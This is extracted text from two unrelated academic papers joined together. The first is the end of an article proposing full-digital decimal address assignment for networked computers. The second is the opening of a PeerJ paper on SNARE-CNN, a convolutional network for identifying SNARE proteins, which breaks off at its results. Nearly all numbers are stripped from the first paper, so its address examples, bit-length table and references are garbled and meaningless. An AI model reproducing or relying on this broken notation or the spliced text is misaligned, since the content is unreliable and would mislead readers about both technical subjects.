global aggregation of unicast address. but it is necessary to provide a address specially used for local communication, namely, local unicast address, which can be applied in communication between nodes at the same link and generating the unicast address of the local link with the structure of address format prefix and network interface identifier and a zero in the middle. the local unicast address can also be applied in addressing of the communication internet interface within the range of the station and generating the unicast address in station with the structure of a format prefix, sub-network identifier and network interface identifier, together with a between the format prefix and sub-network identifier. the address coding method in this study also defines some addresses for special purposes. for example, the address composed of all zeros belongs to a unspecified address and cannot be assigned to any node, which means that the network interface has not obtained a formal address for the time being. in addition, some addresses can be assigned to more than one network interfaces at the same time, and generate a cluster address with the same structure of that of the unicast address. the address can also be assigned to a multicast address, and the address message with the destination of a multicast address would be received simultaneously by all the network interfaces provided with the multicast address. 
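A minimal sketch of the all-zero-domain abbreviation described above, assuming "]" as the domain separator and "[n]" as the bracket notation for a run of n omitted all-zero domains. Only the first run is compressed, which sidesteps the ambiguity discussed in Example I below; the separator and bracket characters, and the exact rendering around the bracket group, are placeholders rather than the normative syntax.

```python
SEP = "]"  # domain separator, a placeholder for the scheme's separator

def compress_zero_domains(domains: list[str]) -> str:
    """Replace the first run of all-zero domains with [n], drop leading zeros."""
    out, i, used = [], 0, False
    while i < len(domains):
        if not used and domains[i].strip("0") == "":
            j = i
            while j < len(domains) and domains[j].strip("0") == "":
                j += 1
            out.append(f"[{j - i}]")   # one bracket group only, to stay unambiguous
            used, i = True, j
        else:
            out.append(domains[i].lstrip("0") or "0")  # keep a single 0 for a zero domain
            i += 1
    return SEP.join(out)

def expand_zero_domains(text: str) -> list[str]:
    """Restore the omitted all-zero domains from a compressed address."""
    domains = []
    for token in filter(None, text.split(SEP)):
        if token.startswith("["):
            domains.extend(["0"] * int(token.strip("[]")))
        else:
            domains.append(token)
    return domains

compressed = compress_zero_domains(["0012", "0", "0", "0", "7"])
print(compressed)                       # -> "12][3]]7" in this placeholder rendering
print(expand_zero_domains(compressed))  # -> ['12', '0', '0', '0', '7']
```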
the technical scheme adopting the above address assignment method provides sufficient address space for the development of the internet in the future, realizes simpler address representation, convenient use and more standardized address assignment. meanwhile, the technical scheme has given full consideration to the size of routing table of the existing router and the current computing power of the computer. the way to internet access with the address prepared by the above coding method is characterized with: successful access to email or the internet realized after inputting the address into the computer modem via a push-button dialing telephone or the computer keyboard and linking into corresponding digital code, which is translated into a ip address or chinese domain name system, all full-digital coded address is corresponding to an existing ip address or chinese domain name system. iv. assignment examples the specific address assignment algorithm is fully explained by the following examples: a. example i through this algorithm, external address of networked computers and intelligent media stored in the database and the internal arithmetic address are created correspondingly. we can evenly divide the entire external address into domains with each address of a decimal integer from - and square brackets are used to separate all the domains. thus, the address is in the format of y]y]y]y]y]y]y]y], in which, every y represents a domain address in the form of a -bit decimal number. the entire internal address is also divided into domains with each address of a binary number from - in the format of x]x]x]x]x]x]x]x], in which, every x represents a domain address in the form of a -bit binary number. for instance: ] ] ] ] ] international journal of advanced network, monitoring and controls volume , no. , ] in this address, the multiple continuous zeros at the left part of each decimal number can be omitted but the all-zero decimal numbers shall be represented at least by a zero. thus, the above address can be written as: ] ] ] ] ] ] ] for further simplifying the address presentation, the continuous zeros in the address can be replaced by a pair of “[ ]”. for instance, the above address can be further simplified as: [ ] ] ] for another instance: ] ] ] ] ] ] ] can be abbreviated as [ ] or[ ] ] ] ] ] ] ] ] can be abbreviated as [ ] or [ ] it should be noted that in abbreviation of the above addresses, you can only use "[]" once to represent a contiguous all-zero field, because multiple uses of [] can result in ambiguous addresses. for instance, address ] ] ] ] ] ] ] can be abbreviated as: [ ] ] ][ ]or[ ] ] ][ ], also ] ] ] ] ][ ]. but not [ ] ] ][ ], otherwise, the number of all-zero fields of the left and right part of the address may be confusing during restoration of the address and then result in ambiguous addresses. besides, for the purpose of further simplification of the address, if there is a continuous sequence of the same arabic numeral in a address domain, such sequence can be replaced by a pair of round brackets, and the omitted numerals, the number of separators and omissions shall be clearly marked from the left to the right in the brackets. for instance: ] ] ] ] ] ] ] ] can be abbreviated as [ ] ( / )] ( / )] ( / ) [ ] in the process of address preparation of networked computers and intelligent terminals, the external address must be corresponding with the internal binary address. 
for such purpose, the method by which address with fixed length and variable location is adopted to make the two corresponding with each other in this example. for instance, the external address [ ] will be corresponding to the internal binary address [ ]( / ) , and the address [ ] will be corresponding to [ ]( / ) . the address prepared by the method mentioned above can be assigned to network interfaces, and if assigned to single network interface, the identifier is then regarded as a unicast address, and message with the destination of a unicast address will be delivered to the only network interface identified by itself. unicast address is with the same good flexibility as that of the multilevel network structure, which is good for solving the difficult problem of router addressing. for instance, a w aggregation global unicast address is provided with three layers, namely the public topology layer, station topology layer and network interface identifier, in which, the public topology layer is consisted of a address prefix (fp), top-level aggregation level(fla), reserved domain (res) and second-level aggregation identifier (nla), the station topology layer is consisted of station-level aggregation identifier, and the foresaid network interface identifier is merely consisted of network interface identifier. the specific structure is as shown in table in the following: international journal of advanced network, monitoring and controls volume , no. , table i. structural table of global unicast address fp( bits) tla identifier ( bits) res( bits) nla identifier ( bits) sla identifier ( bits) network interface identifier ( bits) public topology layer station-level topology layer network interface identifier for instance, the fp of an address is , tla identifier is , res is , nla identifier is , sla identifier is , and the network interface identifier is , then, the entire address is identified by ( / ) ]( / ) ( / )] ( / ) ]( / ) ][ ]. in such address, by the format prefix routing system, it is easy to tell whether the address is a unicast or other type of address. the top-level aggregation identifier is the highest level at the routing hierarchy, and in case of missing of a router, every top-level aggregation identifier shall be provided with a corresponding item in the routing table together with the routing information of provided with top-level aggregation identifiers shall employ second-level aggregation identifiers in establishment of addressing hierarchical structure and identification of internal stations in the process of internal addressing. and any organization is free to select the assignment plan according to their own needs in allocation of their second-level aggregation identifiers so as to establish their own internal addressing hierarchy. establishment of a hierarchical structure is conducive to aggregation of routers at all levels to be greater extent, and realization of a smaller size of the routing table. a structure can be established as shown in table . table ii. hierarchical structure n l a station identifier station-level aggregation identifiers are used for recognition of establishment of internal addressing hierarchical structure and identification of sub-network number by some organizations (stations). the structure can be shown in table in the following. table iii. 
structure of station-level aggregation identifiers s l a sub-network number in which, the amount of the hierarchies in the station-level aggregation identifier field and the length of sla identifier at all levels shall be decided by the organizations themselves according to the topology layer structure of their internal sub-network. for a global unicast address prepared and assigned by the above method; address preparation of a station itself is relatively independent of that of the internet. if a station needs to be readdressed, among all the addresses within the station, only the two parts, namely the top-level aggregation identifiers and second-level aggregation identifiers (public topology layer) need certain modifications and the station-level aggregation identifiers and network interface identifiers can remain the same. with such assignment approach, great convenience is brought to management and allocation of internet network addresses. b. example ii in this example, unified address assignment for various computers and intelligent terminals are basically conducted by the same steps as in example i, but corresponding preparation of external address and internal address can be conducted by way of address with fixed location and variable length. by this method, a variety of external addresses of all computers and intelligent terminals are localized at decimal numbers with the representing range of all decimal integers international journal of advanced network, monitoring and controls volume , no. , between and ; and internal addresses of all computers and intelligent terminals are localized at binary numbers with the representing range of all binary numbers from to . and then a method by address with fixed location and variable length can be adopted to correspond the external addresses with binary internal addresses. to be specific, every bit of the decimal number of the external address are corresponding to bits of binary numbers of the internal address of the computer. for instance, external address of [ ] ] ] ] ] ] ] ] ] ] can be corresponding to the binary internal address of [ ] ] ] l] l] ] ] ] ] ]. in this example, every bit of the decimal number of the address is corresponding to bits of binary numbers of the internal address. in the technical scheme employed in example i and example ii, external address and binary internal address can be evenly divided into domains, domains or domains, and the above mentioned address can be assigned to more than one network interfaces at the same time to foster a cluster address with the same structure of that of unicast address. besides, the foresaid address can also be assigned to multicast address. message with the destination of multicast address can be received simultaneously by all the network interfaces provided with the multicast address. the address coding method in example i and example ii above also defines some addresses for special purposes. for example, the address composed of all zeros belongs to a unspecified address and cannot be assigned to any node, which means that the network interface has not obtained a formal address for the time being. if the address is all one, namely the local loopback address, it is expected to loop back the message to itself at a certain node. the local loopback address is usually used when a test is conducted to see whether a protocol stack works properly. v. 
assignment algorithm interpretation the method by which address assignment of a networked computer by full-digital codes, including full-digital coded address consisted of network access number, telephone number and classification number. the above mentioned network access number refers to the stipulated numeral number of the website established in accordance with the national and regional regulations, for example, the network access number of “shanghai hotline” in shanghai, china is “ ”; the foresaid telephone number consists of the international direct distance dialing codes of the country of the telephone user, the area code for domestic direct dialing of the user and the telephone number of the organization where the user works or the user’s personal telephone number, for example, the telephone number is , in which, is the international distance dialing code in china, is the area code of shanghai, and is the user's phone number, the three parts jointly serve as "telephone number" in the code. this is the key reason why this research adopts the full-digital character code address assignment -- it is simple, easy to remember and would never be duplicated. the classification number is numeric number preceded by the country or the area for unified classified business categories. such digital numbers can be established according to the regulations of the country, area or website of the user, and can either be specified at the main category or subcategory level. since not all access is to be done with subcategories. therefore, in general, those numbers are only specified at a main category level. in such case, digital number of the subcategories can be led after the category number by way of option. in actual use, if customers want to encrypt their addresses, the confidential digital numbers can be led after network access number or telephone number, which can be provided by customers themselves and registered in the address preparation organizations. in the process of use, international journal of advanced network, monitoring and controls volume , no. , customers can choose telephone number dialing or input all the correct digital numbers in a continuous way via computer keyboard and surf the internet after successful connection, which is convenient and efficient. given that many users surf the internet only to send and receive e-mails, and only even apply for a work email, internet service providers shall establish an email for the user which is usually named with three parts of a user name, email server and “@”and indicated by character strings when users apply for an internet account. for easy and unified input, email addresses can be prepared by full-digital coding, and consist of digital number of the user name and the digital number of the domain name of the email server which the email is belongs to. when the above coding method is adopted in email access and browsing the internet, you can use the push-button dialing telephone or the computer keyboard to input its computer modem, and link the corresponding digital code, and then, through the translation software conversion, you can get access to the email or browse the internet. for the purpose of universal use, it is necessary to build a converter which correspond the digital address of the technology in this study with the domain name and ip address of the existing internet. the converter is composed of translation software. 
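A sketch of the translation step just described, assuming a simple registry table maintained by the address preparation organization. The registry contents, the example entries, and the resolve_full_digital helper are all invented for illustration; the text only states that each full-digital coded address corresponds to an existing IP address, domain name, or Chinese domain name.

```python
# Registry mapping a full-digital coded address to an existing domain name and
# IPv4 address; the entries below are invented documentation values.
REGISTRY = {
    "123486216300123401": ("example.org", "203.0.113.10"),
}

def resolve_full_digital(address: str) -> tuple[str, str]:
    """Translate a full-digital coded address into the corresponding
    domain name and IP address, as the translation software would."""
    if not address.isdigit():
        raise ValueError("full-digital addresses contain digits only")
    try:
        return REGISTRY[address]
    except KeyError:
        raise LookupError(f"address {address} is not registered") from None

domain, ip = resolve_full_digital("123486216300123401")
print(domain, ip)
```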
only by designating a full-digital coded address, it can be converted to the corresponding ip address, domain name or chinese domain name system, and each full-digital coded address is corresponding to an existing ip address, domain name or chinese domain name system. since computers could only identify ip address, in this study, it is not only necessary to build a converter to converting full-digital coded address into universal domain name and ip address, but also to designate a server to translate the numeric address established through the technology in this study into ip address so that the computer can identify the address for operation. vi. conclusion the methods designed in this study could not only assign a fixed static address to each networked computer but also allocate a dynamic address to a temporarily networked computer, thus, it is easy for users to apply the digital address. besides, the auxiliary information database is established, with which, the full-digital coded address established through the technology in the study and the existing addresses with internet access, including: domain name, ip address and chinese domain system etc. are listed and corresponding with each other, and users can inquire the address with internet access they need just by opening the database installed in the website. thus, it is easy for users to choose different ways to access the internet by inputting. the database could also be complied into a written document for users to look up and consult. references [ ] xie jianping etc.a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xu dongmei, etc. digital domain name specification.sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . submitted november accepted february published february corresponding author nguyen quoc khanh le, khanhle@ntu.edu.sg, khanhlee @gmail.com academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright le and nguyen distributed under creative commons cc-by . open access snare-cnn: a d convolutional neural network architecture to identify snare proteins from high-throughput sequencing data nguyen quoc khanh le and van-nui nguyen school of humanities, nanyang technological university, singapore university of information and communication technology, thai nguyen university, thai nguyen, vietnam abstract deep learning has been increasingly and widely used to solve numerous problems in various fields with state-of-the-art performance. it can also be applied in bioinformatics to reduce the requirement for feature extraction and reach high performance. 
this study attempts to use deep learning to predict snare proteins, which is one of the most vital molecular functions in life science. a functional loss of snare proteins has been implicated in a variety of human diseases (e.g., neurodegenerative, mental illness, cancer, and so on). therefore, creating a precise model to identify their functions is a crucial problem for understanding these diseases, and designing the drug targets. our snare-cnn model which uses two-dimensional convolutional neural networks and position-specific scoring matrix profiles could identify snare proteins with achieved sensitivity of . %, specificity of . %, accuracy of . %, and mcc of . in cross- validation dataset. we also evaluate the performance of our model via an independent dataset and the result shows that we are able to solve the overfitting problem. compared with other state-of-the-art methods, this approach achieved significant improvement in all of the metrics. throughout the proposed study, we provide an effective model for identifying snare proteins and a basis for further research that can apply deep learning in bioinformatics, especially in protein function prediction. snare-cnn are freely available at https://github.com/khanhlee/snare-cnn. subjects bioinformatics, computational biology, data mining and machine learning keywords position specific scoring matrix, snare protein function, deep learning, membrane fusion, vesicular transport protein, cancer, human disease, biological domain, overfitting, protein family classification introduction deep learning is an advanced machine learning and artificial intelligent technique to learn the representative data with multiple layers of neural networks (lecun, bengio & hinton, ). numerous difficult problems have been solved with deep learning, e.g., speech recognition, visual object recognition, object detection. the advantages of deep learning are: ( ) significantly outperforms other solutions in multiple domains, ( ) reduces the requirement for feature extraction and time consumption with the use of graphic processing units (gpus), and ( ) easily adapts to a new problem. deep neural network how to cite this article le nqk, nguyen v-n. . snare-cnn: a d convolutional neural network architecture to identify snare proteins from high-throughput sequencing data. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:khanhle@ntu.edu.sg mailto:khanhlee @gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/khanhlee/snare-cnn http://doi.org/ . /peerj-cs. models often achieve better performance compared to shallow networks, especially in most of problems with big data. therefore, deep learning becomes popular and attracts numerous huge companies establishing their directions in this field in recent years. nowadays, much progress towards deep learning has been made using different deep neural network architectures. a number of studies showed that using deep learning can enhance results in various fields, e.g., prediction of cervical cancer diagnosis (fernandes et al., ), pirna (wang, hoeksema & liang, ), and isolated guitar transcription (burlet & hindle, ). hence, deep learning is also a fascinating trend in bioinformatics and computational biology research. 
this study attempts to present a framework to apply deep learning in bioinformatics by using two-dimensional convolutional neural network ( d cnn), which is one popular type of deep neural networks. we anticipate our method will lead to a significant improvement when compared to traditional machine learning techniques in the bioinformatics field. in earlier years, researchers used shallow neural networks for solving a number of problems in bioinformatics and computational biology. for example, ou constructed quickrbf package (oyang et al., ) for training radial basis function (rbf) networks and applied them on several bioinformatics problems including classifying electron transport proteins (le, nguyen & ou, ), transporters (le, sandag & ou, ), and binding sites (le & ou, a; le & ou, b). chang & lin ( ) introduced libsvm to help biologists implement bioinformatics models by using support vector machines. recently, as deep learning has been successfully applied in various fields, researchers started to use it in bioinformatics problems, e.g., prediction of pirna (wang, hoeksema & liang, ) and ab initio protein secondary structure (spencer, eickholt & cheng, ). although those studies achieved very good performances, we believe that we can obtain superior results by using d cnn in some bioinformatics applications. in this study, we applied our architecture in the prediction of snare proteins, which is one of the most vital molecules in the life sciences. snare is an evolutionary superfamily of small proteins that have a conservation pattern of – amino acids (snap motifs) in their cytoplasmic domain. snare proteins catalyze cell membrane integration in eukaryotes and are essential for a wide range of cellular processes, including cell growth, cytokinesis, and synaptic transmission (jahn & scheller, ; wickner & schekman, ). most snares contain only one snare motif adjacent to a single c-terminal membrane (e.g., synaptobrevin and syntaxin ). some snares contain two snare motifs that are connected by a long linkage and non-transmembrane sequence (e.g., snap- ) but are attached to the membrane through a post-translational modification such as palmitoylation. various types of snare proteins now identified and several studies demonstrated that a functional loss of snare proteins has been implicated in numerous diseases (e.g., neurodegenerative (hou et al., ), mental illness (honer et al., ), cancer (meng & wang, ; sun et al., ), and so on). therefore, snare proteins play an important function in the cell and there is a need to develop some bioinformatics techniques to identify them. because of the essential role in human diseases, snare proteins attracted various researchers who conducted their research on them. for instance, kloepper team attempted le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to build a database to store and classify snare proteins (kienle, kloepper & fasshauer, ; kloepper, kienle & fasshauer, ; kloepper, kienle & fasshauer, ). next, van dijk et al. ( ) built a framework to predict functions of snares in sub-golgi localization. moreover, weimbs et al. ( ) used bioinformatics techniques to analyze conserved domains in snare. yoshizawa et al. ( ) extracted sequence motifs and the phylogenetic features of snare-dependent membrane trafficking. shi et al. ( ) directed targeting of membrane fusion by snare mimicry by convergent evolution of legionella effectors. 
lu ( ) analyzed the destructive effect of botulinum neurotoxins on the snare protein and proposed that the truncated snap- mutants will disrupt the assembly of the snare core complex, and then inhibit the synaptic membrane fusion accordingly. most published works on snare proteins achieved high performance, but to our knowledge, no researcher conducted the prediction of snare proteins using machine learning techniques. it is challenging and motivates us to create a precise model for this. besides that, we also applied deep learning in this problem, which is a modern technique for classification and obtain high accuracies in various fields. based on the advantages of deep learning, this study consequently proposes the use of a d convolutional neural network (cnn) constructed from position-specific scoring matrix (pssm) profiles to identify snare proteins. the basic principle has already been successfully applied to identify electron transporting proteins (le, ho & ou, ) and rab gtpases (le, ho & ou, ). thus, in this paper, we extend this approach to identify the molecular functions of snare proteins. the main achievements, including contributions to the field, are presented as follows: (i) development of a deep learning framework to identify snare functions from protein sequences, in which our model exhibited a significant improvement beyond traditional machine learning algorithms; (ii) first computational study to identify snare proteins and provide useful information to biologists to discover the snare molecular functions; (iii) valid benchmark dataset to train and test snare proteins with high accuracy, which forms a basis for future research on snare proteins. as shown in a series of recent publications (chen et al., ; cheng, xiao & chou, a; cheng, xiao & chou, b; chou, cheng & xiao, ; feng et al., ; jia et al., ; khan et al., ; xiao et al., b), to develop a really useful statistical predictor for a biological system, one should observe the guidelines of chou’s -step rule (chou, ) to make the following five steps very clear: (i) how to construct or select a valid benchmark dataset to train and test the predictor; (ii) how to formulate the statistical samples with an effective mathematical expression that can truly reflect their intrinsic correlation with the target to be predicted; (iii) how to introduce or develop a powerful algorithm (or engine) to operate the prediction; (iv) how to properly perform cross-validation tests to objectively evaluate the anticipated accuracy of the predictor; (v) how to provide source code and dataset that are accessible to the public. below, we are to describe how to deal with these steps one-by-one. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flowchart for identifying snare proteins using two-dimensional convolutional neural net- works. full-size doi: . /peerjcs. /fig- materials & methods we implemented an efficient framework for identifying snare proteins by using a d cnn and pssm profiles. the framework consists of four procedures: data collection, feature extraction, cnn generation, and model evaluation. figure presents the flowchart of our framework, and its details are described as follows. dataset the dataset was retrieved from the uniprot database (by - - ) (uniprot consortium, ), which is one of the comprehensive resources for the protein sequence. first of all, we collected all snares proteins from the uniprot annotation (by using keyword ‘‘snare’’). 
note that only reviewed proteins (records with information extracted from literature and curator-evaluated computational analysis) were collected. subsequently, blast (altschul et al., ) was applied to remove the redundant sequences with similarity more than %. however, after this process, the rest of proteins only reached snares, and the number of data points was insufficient for a precise deep learning model. hence, we used a cut-off level of % in the cross-validation dataset for more data to create a significant model. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table statistics of all retrieved snare and non-snare proteins. cross-validation independent snare non-snare , we still used similarity of % in the independent dataset to evaluate the performance of the model. this step is a very important step to check if the model was overfitting or not. the proposed problem was the binary classification between snare proteins and general proteins, thus we collected a set of general proteins as negative data. in order to create a precise model, there is a need to collect negative dataset which has a similar function and structure with the positive dataset. from that, it is challenging to build a precise model but it increases our contribution to the predictor. it will also help us decrease the number of negative data collected. after considering the structure and function, we chose vesicular transport protein, which is a general protein including snare protein. we counted it as negative data to perform the classification problem. we removed the redundant data between two datasets as well as the sequences with similarity more than %. finally, there were snare proteins and non-snare proteins used. we then divided data into cross-validation and independent dataset. the detail of the dataset using in this study is listed in table . encoding feature sets from the protein sequence information in order to convert the protein sequence information into feature sets, we applied the pssm matrices for fasta sequences. a pssm profile is a matrix represented by all motifs in biological sequences in general and in protein sequences in particular. it is created by rendering two sequences having similar structures with different amino acid compositions. therefore, pssm profiles have been adopted and used in a number of bioinformatics problems, e.g., prediction of protein secondary structure (jones, ), protein disorder (shimizu, hirose & noguchi, ), and transport protein (ou, chen & gromiha, ) with significant improvements. since the retrieved dataset is in fasta format, it needs to be converted into pssm profiles. to perform this task, we used psi-blast (altschul et al., ) to search all the sequence alignments of proteins in the non-redundant (nr) database with two iterations. the query to produce the pssm profile is as follows: psiblast.exe -num_iterations -db <nr>-in_msa <fasta_file>-out_ascii_<pssm_file> the feature extraction part of fig. indicates the information of generating the pssm capabilities from original pssm profiles. each amino acid in the sequence is represented by a vector of values (each row). first, we summed up all rows with the same amino acid to transform the original pssm profiles to pssm profiles with dimensions. the purpose of this step is to force this data type into something easier for the neural network to deal with. 
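A minimal sketch of this transformation, assuming the standard 20-letter amino acid alphabet and an L × 20 PSSM already parsed from the PSI-BLAST output: rows sharing the same residue are summed into a 20 × 20 (400-element) matrix and normalized by the sequence length, as described here and in the paragraph that follows. The residue ordering and the random toy profile are assumptions for illustration only.

```python
import numpy as np

AMINO_ACIDS = "ACDEFGHIKLMNPQRSTVWY"  # ordering is an assumption

def pssm_to_20x20(sequence: str, pssm: np.ndarray) -> np.ndarray:
    """Collapse an L x 20 PSSM into a 20 x 20 matrix by summing the rows that
    share the same amino acid, then normalize by the sequence length."""
    assert pssm.shape == (len(sequence), 20)
    features = np.zeros((20, 20))
    for residue, row in zip(sequence, pssm):
        idx = AMINO_ACIDS.find(residue)
        if idx >= 0:               # skip non-standard residues
            features[idx] += row
    return features / len(sequence)

# Toy example with a random profile standing in for a real PSI-BLAST PSSM:
rng = np.random.default_rng(0)
seq = "MKTAYIAKQR"
profile = rng.integers(-5, 10, size=(len(seq), 20))
x = pssm_to_20x20(seq, profile)
print(x.shape)  # (20, 20), used as a single-channel "image" for the 2D CNN
```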
Each element of the 20 × 20 input matrix was then divided by the sequence length and scaled before being fed into the neural network.

Input layers for 2D convolutional neural networks

The architecture of our CNN is shown in the lower part of Fig. 1. The CNN contains three stages: an input layer, hidden layers (convolutional, pooling, and fully connected layers), and an output layer. CNNs have been applied in numerous fields with convincing results (Amidi et al.; Palatnik de Sousa). In our study, the input to the CNN is the PSSM corresponding to a protein sequence, so we predict SNARE proteins using PSSM profiles as the input data. Treating the 20 × 20 PSSM profile as a grayscale image of 20 × 20 pixels allows the model to be trained with a two-dimensional CNN. The input PSSM profile is connected to our 2D CNN, in which a variety of parameters were tuned to improve performance. By using a 2D CNN rather than other network structures, we aimed to capture as many hidden spatial features as possible in the PSSM matrices; this preserves the validity of the generated features and avoids the ordering problem inside amino acid sequences. The more hidden layers are stacked, the more hidden features the CNN can generate to identify SNARE proteins. In this work, we used four filter layers, each with a different number of filters and three different kernel sizes per filter.

Multiple hidden layers for deep neural networks

Following the input layer, the hidden layers generate the matrices from which features are learned. They consist of several 2D sub-layers with different parameters and shapes: zero padding, convolutional, max pooling, and fully connected layers with different numbers of filters. All of these layers are combined to form the nodes of the deep neural network, and the quality of the model is determined by the number of layers and parameters. The first layer of our 2D CNN architecture is a 2D zero padding layer, which adds zero values around the borders of the 20 × 20 matrices and enlarges the input shape accordingly. With this padding, applying the filters does not change the output dimension:

$ZP = \frac{K - 1}{2}$

where $K$ is the filter size. Next, a 2D convolution layer is used: features are learned by sliding the kernel across the matrix to its end, and after each step the next layer takes the weights and biases from its previous layer and trains again. A 2D max-pooling layer normally follows the 2D convolution layer; its main parameters are the window size and the stride. In our study, max pooling selects the maximum value over a small window with a fixed stride, which reduces the processing time in the subsequent layers. The output size of a convolutional layer is computed as

$OS = \frac{W - K + 2P}{S} + 1$

where $W$ is the input size, $K$ is the filter size, $P$ is the padding, and $S$ is the stride.
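To make the two formulas above concrete, the following sketch evaluates them for an assumed 3 × 3 kernel on the 20 × 20 input and for a 2 × 2 pooling window with stride 2; these specific sizes are illustrative assumptions rather than the values used in the model.

```python
def conv_output_size(w: int, k: int, p: int, s: int) -> int:
    """Spatial output size of a convolution/pooling layer:
    OS = (W - K + 2P) / S + 1."""
    return (w - k + 2 * p) // s + 1

# With zero padding of ZP = (K - 1) / 2, the spatial size is preserved:
k = 3                       # assumed kernel size
zp = (k - 1) // 2
print(conv_output_size(w=20, k=k, p=zp, s=1))  # 20: padding keeps the 20x20 input size
print(conv_output_size(w=20, k=2, p=0, s=2))   # 10: assumed 2x2 max pooling, stride 2
```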
Output layers

The first element of the output stage is a flatten layer, which converts the input matrix into a vector before the fully connected layers. We applied two fully connected layers: in each, every node is connected to all nodes of the previous layer. Fully connected layers are typically used in the last stages of CNNs; the nodes of the first fully connected layer are connected to the flatten layer, allowing the model to gain more knowledge and perform better, and the second connects the first fully connected layer to the output layer. We also inserted a dropout layer, which improves the results and helps the model avoid overfitting (Srivastava et al.). In the dropout layer, the model randomly deactivates a number of neurons with a certain probability p; by tuning the dropout value (between 0 and 1), we save computing time in the following layers and speed up training. Furthermore, an additional non-linear operation, ReLU (rectified linear unit), is applied after each convolution:

$f(x) = \max(0, x)$

where $x$ is the input to a neuron. The output of the model is computed through a softmax function, which gives the probability of each possible class:

$\sigma(z)_i = \frac{e^{z_i}}{\sum_{k=1}^{K} e^{z_k}}$

where $z$ is a $K$-dimensional input vector and $\sigma(z)$ contains real values in the range (0, 1) giving the predicted probability of each class for the sample. In summary, the trainable parameters of the model are listed in Table 2.

Table 2. All layers and trainable parameters of the two-dimensional convolutional neural network in this study. The layer sequence is: four padding–convolution–pooling blocks (zero_padding2d_1, conv2d_1, max_pooling2d_1 through zero_padding2d_4, conv2d_4, max_pooling2d_4), followed by flatten_1, dense_1, dropout_1, dense_2, and activation_1.
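A sketch of this architecture in Keras with a TensorFlow backend (the toolkit named later in the Results). The filter counts, kernel size, dense width, and dropout rate below are placeholder assumptions standing in for the values of Table 2, and build_snare_cnn is a hypothetical helper rather than code from the paper.

```python
from tensorflow.keras import layers, models

def build_snare_cnn(filters=(32, 64, 128, 256), kernel_size=(3, 3),
                    dense_units=128, dropout_rate=0.5):
    """Four padding/conv/pooling blocks, then flatten, dense, dropout, softmax."""
    model = models.Sequential()
    model.add(layers.ZeroPadding2D(padding=1, input_shape=(20, 20, 1)))  # 20x20 PSSM image
    model.add(layers.Conv2D(filters[0], kernel_size, activation="relu"))
    model.add(layers.MaxPooling2D(pool_size=2, strides=2))
    for f in filters[1:]:
        model.add(layers.ZeroPadding2D(padding=1))
        model.add(layers.Conv2D(f, kernel_size, activation="relu"))
        model.add(layers.MaxPooling2D(pool_size=2, strides=2))
    model.add(layers.Flatten())
    model.add(layers.Dense(dense_units, activation="relu"))
    model.add(layers.Dropout(dropout_rate))
    model.add(layers.Dense(2, activation="softmax"))   # SNARE vs non-SNARE
    model.compile(optimizer="nadam", loss="categorical_crossentropy",
                  metrics=["accuracy"])
    return model

model = build_snare_cnn()
model.summary()
```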
Performance evaluation

The main purpose of this study is to predict whether or not a sequence is a SNARE protein; we therefore label SNARE proteins as "positive" and non-SNARE proteins as "negative". For each dataset, we first trained the model using cross-validation on the training data; based on the cross-validation results, hyper-parameter optimization was applied to find the best model, and the independent dataset was finally used to assess the predictive ability of the resulting model. Based on Chou's symbols introduced for studying protein signal peptides (Chou), a set of four intuitive metrics was derived, as given in the corresponding equations of Chen et al. and Xu et al. For evaluating the methods we also adopted Chou's criterion, used in many bioinformatics studies (Chen et al.; Feng et al.; Taju et al.). Both the traditional metrics found in textbooks and the intuitive metrics derived from Chou's symbols are valid only for single-label systems, where each sample belongs to exactly one class. For multi-label systems, where a sample may belong to several classes simultaneously and which have become more frequent in systems biology (Cheng, Xiao & Chou; Cheng et al.; Xiao et al.), systems medicine (Cheng et al.) and biomedicine (Qiu et al.), a completely different set of metrics, as defined by Chou, is needed. The standard metrics used here are sensitivity, specificity, accuracy, and the Matthews correlation coefficient (MCC), computed with the formulae below (TP, FP, TN, and FN are the true positive, false positive, true negative, and false negative counts, respectively):

$Sn = 1 - \frac{N^{+}_{-}}{N^{+}}, \quad 0 \le Sn \le 1$

$Sp = 1 - \frac{N^{-}_{+}}{N^{-}}, \quad 0 \le Sp \le 1$

$Acc = 1 - \frac{N^{+}_{-} + N^{-}_{+}}{N^{+} + N^{-}}, \quad 0 \le Acc \le 1$

$MCC = \frac{1 - \left(\frac{N^{+}_{-}}{N^{+}} + \frac{N^{-}_{+}}{N^{-}}\right)}{\sqrt{\left(1 + \frac{N^{-}_{+} - N^{+}_{-}}{N^{+}}\right)\left(1 + \frac{N^{+}_{-} - N^{-}_{+}}{N^{-}}\right)}}, \quad -1 \le MCC \le 1$

The relations between these symbols and TP, FP, TN, FN are:

$N^{-}_{+} = FP, \quad N^{+}_{-} = FN, \quad N^{+} = TP + N^{+}_{-}, \quad N^{-} = TN + N^{-}_{+}$

Figure 2. Amino acid composition in SNARE and non-SNARE proteins.

Results and discussions

The quality and reliability of the modeling techniques are important factors in this study. We therefore designed experiments to analyze the data, perform the calculations, and make the comparisons reported in this section.

Composition of amino acids in SNARE and non-SNARE proteins

